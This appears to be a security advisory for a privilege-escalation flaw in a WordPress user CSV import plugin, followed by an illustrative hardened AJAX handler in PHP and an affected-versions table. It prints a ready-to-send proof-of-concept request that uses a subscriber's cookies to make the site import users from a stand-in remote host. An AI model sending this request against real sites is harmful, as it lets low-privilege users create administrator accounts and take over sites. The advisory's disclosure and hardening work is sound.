“The flaw allowed anybody with subscriber-level access or above to import new users via a CSV file, including administrative-level users”, so any user at subscriber level or above could escalate their privileges.
```http
POST /wp-admin/admin-ajax.php?import_page=wordpress_hf_user_csv&step=3 HTTP/1.1
Host: EXAMPLE.com
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
Origin: http://EXAMPLE.com
Referer: http://EXAMPLE.com/wp-admin/admin.php?import=wordpress_hf_user_csv&step=2
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: {SUB+ COOKIES}
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 133

action=user_csv_import_request&file=http://REMOTESITE.com/USERS.csv&start_pos=0&end_pos=
```

PoC video: https://www.youtube.com/watch?v=0ejJwbFJpcU
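The root cause is an AJAX import handler that never asks whether the caller is allowed to create users, so the request above works with nothing more than a subscriber's cookies. The handler below is an added example of how such an endpoint is hardened in WordPress; it is not the plugin's own code or its actual fix. The hook name `wp_ajax_user_csv_import_request` is derived from the `action` parameter in the request, while the nonce action `hf_user_csv_import`, the `security` field name and the helper names are assumptions chosen for illustration. The parameters it reads (`file`, `start_pos`, `end_pos`, including the empty `end_pos` seen in the request) mirror the advisory's request.

```php
<?php
/**
 * Added example, not the plugin's code: a hardened admin-ajax handler for a
 * user CSV import. Hook, nonce action and helper names are assumptions.
 * Only the 'wp_ajax_' hook is registered, so unauthenticated callers never
 * reach the handler at all.
 */
add_action( 'wp_ajax_user_csv_import_request', 'hardened_user_csv_import_request' );

function hardened_user_csv_import_request() {
    // 1. CSRF: the import page must have emitted the matching nonce with
    //    wp_nonce_field( 'hf_user_csv_import', 'security' ) (assumed names).
    check_ajax_referer( 'hf_user_csv_import', 'security' );

    // 2. Authorisation: the check the vulnerable endpoint lacked. A subscriber
    //    holds neither capability, so the request is refused with 403.
    if ( ! current_user_can( 'create_users' ) || ! current_user_can( 'promote_users' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient privileges.' ), 403 );
    }

    // 3. Input: the PoC points "file" at a remote host. Accept only a bare file
    //    name that resolves inside this site's uploads directory, never a URL.
    $file    = isset( $_POST['file'] ) ? sanitize_text_field( wp_unslash( $_POST['file'] ) ) : '';
    $uploads = wp_upload_dir();
    $base    = realpath( $uploads['basedir'] );
    $path    = ( '' !== $file ) ? realpath( $base . '/' . basename( $file ) ) : false;
    if ( false === $path || 0 !== strpos( $path, $base . DIRECTORY_SEPARATOR ) ) {
        wp_send_json_error( array( 'message' => 'Invalid import file.' ), 400 );
    }

    // An empty end_pos (as in the PoC request) means "to the end of the file".
    $start = isset( $_POST['start_pos'] ) ? absint( $_POST['start_pos'] ) : 0;
    $end   = ( isset( $_POST['end_pos'] ) && '' !== $_POST['end_pos'] )
        ? absint( $_POST['end_pos'] ) : PHP_INT_MAX;

    // 4. Role ceiling: even an authorised importer may only assign roles it is
    //    itself allowed to edit. get_editable_roles() is an admin-side function.
    require_once ABSPATH . 'wp-admin/includes/user.php';
    $allowed_roles = array_keys( get_editable_roles() );

    $created = hardened_import_rows( $path, $start, $end, $allowed_roles );
    wp_send_json_success( array( 'created' => $created ) );
}

/**
 * Reads rows [$start, $end] of a CSV with a header line and creates one user
 * per row. Any role outside $allowed_roles is downgraded to subscriber rather
 * than honoured, so a crafted CSV cannot mint administrators.
 */
function hardened_import_rows( $path, $start, $end, $allowed_roles ) {
    $handle = fopen( $path, 'r' );
    if ( false === $handle ) {
        return 0;
    }
    $header  = fgetcsv( $handle );
    $created = 0;
    $row_no  = 0;
    while ( ( $row = fgetcsv( $handle ) ) !== false ) {
        $row_no++;
        if ( $row_no < $start ) {
            continue;
        }
        if ( $row_no > $end ) {
            break;
        }
        // Skip malformed rows instead of letting array_combine() fail.
        if ( ! is_array( $header ) || count( $row ) !== count( $header ) ) {
            continue;
        }
        $data = array_combine( $header, $row );
        $role = isset( $data['role'] ) ? sanitize_key( $data['role'] ) : 'subscriber';
        if ( ! in_array( $role, $allowed_roles, true ) ) {
            $role = 'subscriber';
        }
        $user_id = wp_insert_user( array(
            'user_login' => sanitize_user( isset( $data['user_login'] ) ? $data['user_login'] : '' ),
            'user_email' => sanitize_email( isset( $data['user_email'] ) ? $data['user_email'] : '' ),
            'user_pass'  => wp_generate_password( 24 ),
            'role'       => $role,
        ) );
        if ( ! is_wp_error( $user_id ) ) {
            $created++;
        }
    }
    fclose( $handle );
    return $created;
}
```

The order of the checks matters: the nonce and capability checks run before any request parameter is read, so an attacker with a subscriber session gets a 403 without the server ever touching the `file` value, and the role ceiling means that even a legitimate editor cannot use the importer to create a role above their own.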
Affected products (CPE):

| Name | Operator | Version |
|---|---|---|
| users-customers-import-export-for-wp-woocommerce | lt | 1.3.9 |